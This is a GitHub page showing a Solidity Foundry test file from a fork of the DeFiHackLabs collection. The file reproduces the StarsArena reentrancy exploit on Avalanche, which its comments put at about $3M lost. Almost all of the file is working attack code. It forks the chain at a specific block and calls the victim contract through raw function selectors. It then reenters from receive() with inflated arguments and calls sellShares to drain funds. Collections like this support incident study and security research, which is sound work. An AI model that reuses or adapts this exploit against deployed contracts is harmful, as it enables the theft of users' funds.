forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathStarsArena_exp.sol
77 lines (66 loc) · 2.35 KB
/
StarsArena_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./interface.sol";
// @KeyInfo - Total Lost : ~3M$
// Attacker : https://snowtrace.io/address/0xa2ebf3fcd757e9be1e58b643b6b5077d11b4ad7a
// Attack Contract : https://snowtrace.io/address/0x7f283edc5ec7163de234e6a97fdfb16ff2d2c7ac
// Victim Contract : https://snowtrace.io/address/0xa481b139a1a654ca19d2074f174f17d7534e8cec
// Attack Tx : https://snowtrace.io/tx/0x4f37ffecdad598f53b8d5a2d9df98e3c00fbda4328585eb9947a412b5fe17ac5
// @Analysis
// https://twitter.com/BlockSecTeam/status/1710556926986342911
// https://twitter.com/Phalcon_xyz/status/1710554341466395065
// https://twitter.com/peckshield/status/1710555944269292009
contract ContractTest is Test {
address private constant victimContract =
0xA481B139a1A654cA19d2074F174f17D7534e8CeC;
bool private reenter = true;
function setUp() public {
vm.createSelectFork("Avalanche", 36136405);
}
function testExploit() public {
deal(address(this), 1 ether);
emit log_named_decimal_uint(
"Attacker AVAX balance before exploit",
address(this).balance,
18
);
(bool success, ) = victimContract.call{value: 1 ether}(
abi.encodeWithSelector(
bytes4(0xe9ccf3a3),
address(this),
true,
address(this)
)
);
require(success, "Call to function with selector 0xe9ccf3a3 fail");
(bool success2, ) = victimContract.call(
abi.encodeWithSignature(
"sellShares(address,uint256)",
address(this),
1
)
);
require(success2, "Call to sellShares() fail");
emit log_named_decimal_uint(
"Attacker AVAX balance after exploit",
address(this).balance,
18
);
}
receive() external payable {
if (reenter == true) {
(bool success, ) = victimContract.call(
abi.encodeWithSelector(
bytes4(0x5632b2e4),
91e9,
91e9,
91e9,
91e9
)
);
require(success, "Call to function with selector 0x5632b2e4 fail");
reenter = false;
}
}
}